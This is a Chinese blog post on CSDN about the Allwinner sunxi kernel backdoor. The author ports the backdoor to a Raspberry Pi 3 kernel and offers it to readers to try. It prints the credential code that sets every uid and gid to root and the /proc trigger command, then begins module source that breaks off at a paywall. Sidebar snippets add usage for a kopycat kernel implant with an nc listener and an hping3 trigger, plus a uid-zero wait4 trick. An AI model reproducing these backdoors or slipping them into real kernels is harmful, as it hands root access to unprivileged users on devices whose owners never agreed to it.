全志的 Linux 内核后门分析

最新推荐文章于 2024-04-21 02:56:47 发布
最新推荐文章于 2024-04-21 02:56:47 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: arm 文章标签: raspberry pi kernel 内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_34308866/article/details/51425308
版权

最近全志开发人员在其kernel中留下后门一事闹得沸沸扬扬。还不知道的同学请参看
http://www.cnbeta.com/articles/501193.htm

通过写入rootmydevice/proc/sunxi-debug/sunxi-debug,一个普通用户就能拥有root的权限。实际作用代码片段如下:

cred->uid = GLOBAL_ROOT_UID;
cred->gid = GLOBAL_ROOT_GID;
cred->suid = GLOBAL_ROOT_UID;
cred->euid = GLOBAL_ROOT_UID;
cred->euid = GLOBAL_ROOT_UID;
cred->egid = GLOBAL_ROOT_GID;
cred->fsuid = GLOBAL_ROOT_UID;
cred->fsgid = GLOBAL_ROOT_GID;

本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。有兴趣的同学可以玩玩。下面是我修改过的代码。将其编译成模块,使用root插入这个模块后,任意一个用户执行如下命令,就会拥有root权限了。

echo “rootmydevice” > /proc/sunxi-debug/sunxi-debug

当这个模块被移除,拥有root权限的普通用户恢复原来的权限。

/*
 * Sunxi_debug.c
 *
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 */
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/export.h>
最低0.47元/天 解锁文章
NewbieRock
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kopycat:Linux内核无模块植入(后门
03-05
0 KOPYCAT-Linux内核模块的植入程序(后门) 用法 $ make $ sudo insmod kopycat.ko insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device $ lsmod | grep kopycat $ cat /proc/modules | grep kopycat 启动nc侦听器: $ nc -l 6666 通过发送带有秘密短语的ICMP数据包来触发后门: $ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1 作者 2021年
Linux内核源码分析方法
03-02
发布于2013-5-15Linux内核代码的庞大令不少人“望而生畏”,也正因为如此,使得人们对Linux的了解仅处于泛泛的层次。如果想透析Linux,深入操作系统的本质,阅读内核源码是最有效的途径。我们都知道,想成为优秀的...
Linux内核模块入门之简单内核后门
m0_73494896的博客
09-03 998
Linux内核支持运行时动态扩展,即运行时动态加载内核扩展模块(.ko文件),ko文件所包含的代码经加载后即成为内核代码的一部分,拥有内核特权,可以调用内核其它组件,访问内核空间数据以及操作硬件。当然也有跟内核代码一样的限制,如较小的函数调用栈,不支持浮点运算等。此外,由于众所周知的原因,开发内核模块,只能使用C语言。
NanoPi-NEO 全志H3移植Ubuntu 22.04 LTS、u-boot、Linux内核/内核树、mt7601u USB-Wi-Fi支持、配置CLion用于Linux驱动开发
最新发布
ErBW_s的博客
04-21 1689
想在NanoPi-NEO上开发屏幕驱动,但是看了下文件目录发现没有内核树,导致最基础的结构体都无法使用,于是寻找内核树安装方法。但官方提供的内核为4.14太旧了apt找不到对应的版本(其实后面发现不需要用apt,可以在kernel.org上下载,但反正都装了那就当学习一下怎么移植了),于是选择自己重新构建了整个系统。
Linux内核后门的原理及简单实战应用(转)
csd3176的博客
08-10 138
Linux内核后门的原理及简单实战应用(转)[@more@]   以下代码均在linux i86 2.0.x的内核下面测试通过。它也许可以在之前的版本通过,但并没有被测试过。因为从2.1.x内核版本就引入了相当大的改变,显著...
Linux内核后门
哈兜King
02-09 739
if((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;    像不像wait4函数,正常情况下没有任何影响,但是如果调用程序故意传入非法值,if表达式的第二部分就会执行。该部分会将程序的用户ID(current->uid)设为0,在Linux中就是root用户。
关于Linux内核后门的原理和简单实战
热门推荐
CSDN_document的专栏
07-11 1万+
      作者:中华补天网用户空间与内核空间linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。内存被分为两个单元: 内核区域和用户区域。(译者注:我觉得还是这样叫比较顺口)内核区域存放并运行着核心代码,当然,顾名思义,用户区域也存放并运行用户程序。当然,作为用户进程来讲它是不能访问内核区域内存空间以及其他用户进程的地址空间的。     不幸地是, 核心进程也有同
linux 内核 后门,一个简单的Linux内核后门原型(ZT)
weixin_35336727的博客
04-30 151
作者:wzt 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵/** Kernel mode connect backdoor,haha~** just a demo module to teach you how to write a backdoor in kernel mode,* i belive you can add more code to make ...
《深入分析Linux内核源代码》
06-13
《深入分析Linux内核源代码》 第一章 走进Linux 第二章 Linux运行的硬件基础 第三章 中断机制 第四章 进程描述 第五章 进程调度与切换 第六章 Linux 内存管理 第七章 进程间通信 第八章 虚拟文件系统 第九章 Ext2 ...
Linux 内核加解密流程分析
06-21
文档从源码层面分析linux 内核加解密架构的实现。文档前半部分分析内核加解密用到的重要数据结构各成员变量的作用及各个数据结构之间的关系。后半部分分析加解密流程,函数调用关系。重要源码都有中文注释。是一篇从...
Linux内核分析概述.ppt
11-13
Linux内核分析概述 Linux操作系统内核Linux系统的核心部分,负责管理系统的硬件资源,调度进程,实现系统调用,以及提供基础的服务。Linux最初由芬兰赫尔辛基大学的学生Linus Torvalds于1991年开发,旨在创建一个...
全志系列芯片android与Linux内核按键驱动源码
10-20
全志系列芯片android与Linux内核按键驱动源码
全志平台GPIO配置与管理
03-20
本手册提供了配置系统与 GPIO 管理中的一些概念,以及可能使用到的函数接口, 并在其中给出了实际范例,希望可以通过阅读这个手册,来解决实际使用中遇到的,和 配置系统或GPIO 管理相关的问题
linux内核启动后门,Linux下编写隐蔽的自启动回连后门
weixin_35683252的博客
04-30 271
一直很想补充LKM方式未实现的ROOTKIT的后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...
【转载】全志Linux 内核后门分析
seiyaaa的专栏
03-22 382
据外媒 arstechnica 报道,一家中国的芯片级系统厂商全志(allwinner) 在其开发的产品中携带的内核里遗留了一个 root 后门。该公司使用的内核 linux-3.4-sunxi,原先用于支持全志的 ARM 芯片平板上的 Android,它也有一个社区版本。本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。通过写入rootmydevice到/proc/sunxi-debug/sunxi-debug,一个普通用户就能拥有root的权限。
Linux 内核后门的原理和简单实战
Top大杂烩
05-31 2421
用户空间与内核空间---------------------------linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。  <!--google_ad_client = "pub-2299987709779770";google_ad_width = 300;google_ad_heigh
全志A10_linux3.0内核编译记录
02-05 1909
这次为了编译这个内核花费了我半个多月的时间.期间学习了不少关于内核的makfile和android编译的知识,也了解了下buildroot这个工具.写点东西记录一下把.blog写的不多,条理不清晰,有漏洞请见谅,只是提供个关键词给搜索的人. 第一次尝试编译时按照  Android A10(4.0.3)系统编译详解.pdf  编译打包出来的镜像可用,但是内核没有生成Module.symvers .
cred
lhj893614438的博客
01-20 415
cred这个机制背后的思想,就是“使得主体和客体分离”。 这个思想是很自然的,主体和客体分离总是一件好事,这样可以不至于使事情变得不可控制,但是在设计一个系统的时候,我们往往不能一开始就做到这一点,必然经过一次次地筛选过滤之后,才可以将留下来的东西重新组合,最终做到主体和客体分离,就好比我们盖一座房子,必然的一开始我们不能将房子一块一块的运过来只要组合就行,而是必须运过来水泥,沙子,钢筋,然后...
Linux 内核】进程管理
wenqian 'blog
04-19 2368
进程与程序的区别:程序是静态的一段代码,是一些保存在非易失性存储器的指令的有序集合,没有任何执行的概念;进程是一个动态的概念,它是程序执行的过程,包括动态创建、调度和消亡的整个过程,换句话说,进程是程序执行时的一个实例,即它是程序已经执行到何种程度的数据结构的汇集,也就是正在执行的程序代码的实时结果,从内核的观点看,进程的目的就是担当分配系统资源(CPU时间,内存等)的基本单位,是资源分配的最小单
linux内核情景分析pdf
06-28
linux内核情景分析pdf》是一本介绍Linux内核的教材,作者是罗柏特(Robert Love),他是一位资深的Linux内核开发者。这本书主要分为三个部分,分别是进程管理、内存管理和文件系统,涵盖了Linux内核中三个最核心的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值